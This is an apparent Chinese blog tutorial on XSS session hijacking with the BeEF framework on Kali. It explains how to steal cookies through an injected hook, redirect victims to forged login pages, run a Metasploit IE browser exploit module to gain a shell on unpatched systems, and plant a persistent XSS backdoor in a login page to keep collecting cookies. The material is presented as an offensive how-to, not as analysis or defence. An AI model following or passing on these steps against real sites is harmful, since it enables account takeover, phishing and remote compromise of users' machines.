zoukankan      html  css  js  c++  java
  • XSS之会话劫持

    1.搭建XSS利用平台beef

    启动beef

    kali自带beef工具,第一次启动beef,使用命令:

    beef-xss

    然后提示输入密码即可,自行安装。

    安装完成后查看配置文件: /usr/share/beef-xss/config.yaml  获得账户密码

     启动beef后会给出网址,提供我们管理会话:

    2.利用XSS获取cookie

    终端启动beef时,会出现XSS攻击代码,将代码放到存在XSS的地方,将会获得会话

    beef攻击代码:

     成功界面:

     获取cookie:

     3.XSS会话劫持

    beef提供会话劫持功能,指定要跳转的网页即可重定向到指定网页

    执行后将跳转到指定网页

    可以指定网址为自己伪造的登录页面,完成一次社工。

    4.XSSgetshell

    配合msf获取系统权限(ie低版本且未打补丁)

    msf执行:
    use exploit/windows/browser/ie_execcommand_uaf   //选择攻击模块
    show options   //查看选项
    set srvhost 192.168.51.132    //设定攻击主机
    set srvport 8888   //设定端口
    set uripath /    //设定路径为根
    exploit  //攻击

    完成以上步骤后,重定向被劫持的ie浏览器到攻击IP:8888。如没有打补丁且小于等于V9一般可以控制。

    5.XSS后门

    主要原理就是长期潜伏与网站页面中,不管如何修改密码,当点击存在隐藏XSS的页面将返回cookie。

    所以可以给登录页面中插入一条XSS语句,当每次登陆后都能够获得cookie

  • 相关阅读:
    elasticsearch 5.x 系列之七 基于索引别名的零停机升级服务
    Linux 查看系统硬件信息(实例详解)
    linux grep命令详解
    Boot loader: Grub进阶(转)
    Boot loader: Grub入门(转)
    内核模块管理(转)
    Centos启动流程(转)
    Linux 内核启动流程(转)
    程序的运行顺序(转)
    查询进程打开的文件(转)
  • 原文地址:https://www.cnblogs.com/Shepherd-boy/p/15074481.html
Copyright © 2011-2022 走看看